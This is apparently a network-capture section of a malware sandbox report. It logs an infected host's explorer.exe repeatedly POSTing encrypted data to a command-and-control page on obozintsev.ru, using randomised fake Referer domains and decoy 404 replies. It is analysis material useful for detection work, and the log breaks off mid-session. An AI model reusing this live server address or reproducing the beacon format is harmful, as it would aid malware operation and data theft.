                                                                                                                        Nov 30, 2024 11:12:24.908046961 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://klvjvwlocecf.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 287
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:24.908066034 CET287OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 21 da f9
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA .[k,vu%!xxQut$z(xk<o'mPRJ)R0C`?IPp&/"1X5/!x(WnSq)0iqFehZi^y92&|
                                                                                                                        Nov 30, 2024 11:12:26.650377035 CET152INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:26 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 04 00 00 00 72 e8 81 ed
                                                                                                                        Data Ascii: r


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.449737189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:26.785270929 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://totrulptsxj.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 335
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:26.785303116 CET335OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 64 29 c3 8e
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vud)zHE`t`a(zF`&;[cQ30.^dQgZ4a^IJQ3VtX[/idjzmE|}j3)W0
                                                                                                                        Nov 30, 2024 11:12:28.533607960 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:28 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.449738189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:28.662853003 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://fkyftbqjpntne.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 203
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:28.662890911 CET203OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5b 15 b2 98
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu[dLSOag8Q]/gA[#a]J*]&Z.AO`N6DB*sJuVdV]
                                                                                                                        Nov 30, 2024 11:12:30.464797974 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:30 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.449739189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:30.587718010 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://vwrmkfcdqeqnf.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 345
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:30.587743998 CET345OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 28 2e ae a2
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu(.&xq.bI'fMA+E3B9/?3%CksYZG|wjwzEK@'7{FBj'X^w
                                                                                                                        Nov 30, 2024 11:12:32.393549919 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:32 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.449740189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:32.517201900 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ybhmruutgjll.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 253
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:32.517262936 CET253OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5b 18 a6 f2
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu[7Tcp'4zz4HbGZC axWur'" C0Q]'r&Q\wlhF`,6t8ab%3'<
                                                                                                                        Nov 30, 2024 11:12:34.315684080 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:33 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.449741189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:34.490216017 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://idmlsaxfuvndeti.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 160
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:34.490226030 CET160OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 44 29 dc 97
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuD)aH@ouDfG@gEmY_2^8[8ipvOJE
                                                                                                                        Nov 30, 2024 11:12:36.283663034 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:35 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.449742189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:36.406519890 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://dqwcacyxyiufxcg.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 122
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:36.406564951 CET122OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 64 35 aa 91
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vud5sPl~pnaMD*5{n
                                                                                                                        Nov 30, 2024 11:12:38.493619919 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:38 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.449743189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:38.616270065 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://vbibiexffybg.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 126
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:38.616338015 CET126OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 4a 19 ab 98
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuJ^Vcu.L.|k8x%?
                                                                                                                        Nov 30, 2024 11:12:40.403886080 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:40 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.449744189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:40.539100885 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://rcoksbrtpdmb.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 169
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:40.539115906 CET169OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 65 06 c4 90
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vueG_epT='rt4gfvPK,&kO:&P87fd2
                                                                                                                        Nov 30, 2024 11:12:42.335429907 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:42 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.449745189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:42.461447954 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://limsldbbguqnsba.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 262
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:42.461447954 CET262OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 77 25 af f4
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuw%JEe9g_N8~]g1lex1@6IANN:J@bB34]B_Zj!f:aa$CfuajO\!
                                                                                                                        Nov 30, 2024 11:12:44.476198912 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:44 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.449746189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:44.601337910 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://indpkapnwuhe.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 271
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:44.601353884 CET271OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 3f 58 e6 9c
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu?X\GCY`bIJ)1U1ss%$Fw7'M@s}1Y$RRjK#x0sI*W4)sOx;}|:G$e
                                                                                                                        Nov 30, 2024 11:12:46.397649050 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:46 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.449747189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:46.529252052 CET285OUTPOST /tmp/index.php HTTP/1.1
